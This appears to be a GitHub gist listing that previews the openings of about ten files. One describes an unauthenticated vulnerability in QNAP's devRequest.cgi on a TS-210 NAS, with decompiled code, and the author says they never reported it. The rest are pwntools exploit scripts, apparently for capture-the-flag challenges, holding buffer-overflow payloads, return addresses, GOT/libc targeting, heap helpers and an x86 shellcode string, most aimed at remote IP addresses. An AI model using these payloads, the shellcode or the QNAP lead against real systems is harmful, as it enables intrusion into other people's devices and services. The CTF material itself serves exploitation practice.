This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
I recently noticed a bug in QNAP. I have patched this bug on the latest patch. (I did not report it.) My environment was TS-210 and the vulnerability was in devRequest.cgi | |
And this bug does not require authentication by default. | |
v0 = CGI_Get_Input(); | |
dword_27FEC = v0; | |
v1 = CGI_Find_Parameter(v0, "todo"); | |
if ( v1 && !strcmp(*(const char **)(v1 + 4), "get_keyfile") && (v2 = CGI_Find_Parameter(dword_27FEC, "password")) != 0 ) | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
from hexdump import * | |
#p = process("./ohmybof") | |
p = remote("223.194.105.182", 41001) | |
def main(): | |
popret = 0x80482ad | |
wr = 0x080483E3 | |
payload = "A" * 24 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
r = remote('223.194.105.182',29001) | |
def main(): | |
payload = 'A'*204 | |
payload += p32(0x20f31) | |
payload += 'A'*192 | |
payload += p32(0x80485bd) | |
payload += p32(0x8048980) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
r = remote("223.194.105.182", 22901) | |
def main(): | |
payload = "A" * 0x1c | |
payload += "BBBB" | |
payload += p32(0x080487F9) | |
r.send(payload) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
from hexdump import * | |
r = remote("223.194.105.182", 22900) | |
def main(): | |
shellcode = ("\xda\xd4\xba\x11\xf2\x16\x5f\xd9\x74\x24\xf4\x5e\x33\xc9" + | |
"\xb1\x0d\x31\x56\x18\x03\x56\x18\x83\xee\xed\x10\xe3\x35" + | |
"\x06\x8d\x95\x98\x7e\x45\x8b\x7f\xf7\x72\xbb\x50\x74\x15" + | |
"\x3c\xc7\x55\x87\x55\x79\x20\xa4\xf4\x6d\x3c\x2b\xf9\x6d" + |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
from hexdump import * | |
#p = process("./attackme") | |
p = remote("223.194.105.182", 37100) | |
libc = ELF("./libc-2.23.so") | |
def main(): | |
read = 0x080483B0 | |
read_got = 0x804A00C |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
from hexdump import * | |
import time | |
p = process("./messenger") | |
#p = remote("110.10.212.137", 3334) | |
def leave(size, data): | |
p.sendline("L") | |
time.sleep(0.1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
from hexdump import * | |
import time | |
#r = remote("localhost", 8889) | |
r = remote("110.10.212.130", 8889) | |
def echo(data): | |
r.sendline("1") | |
time.sleep(0.1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
from time import * | |
from hexdump import * | |
p = process("./solo") | |
def malloc(idx, size, data): | |
p.sendline("1") | |
p.sendline(idx) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
#p = process("./ez_heap") | |
p = remote("52.199.49.117", 10003) | |
def getHeaptr(): | |
buf = p.recvline() | |
heaptr = int(buf[:-1], 16) | |
log.info("heap: " + hex(heaptr)) |
NewerOlder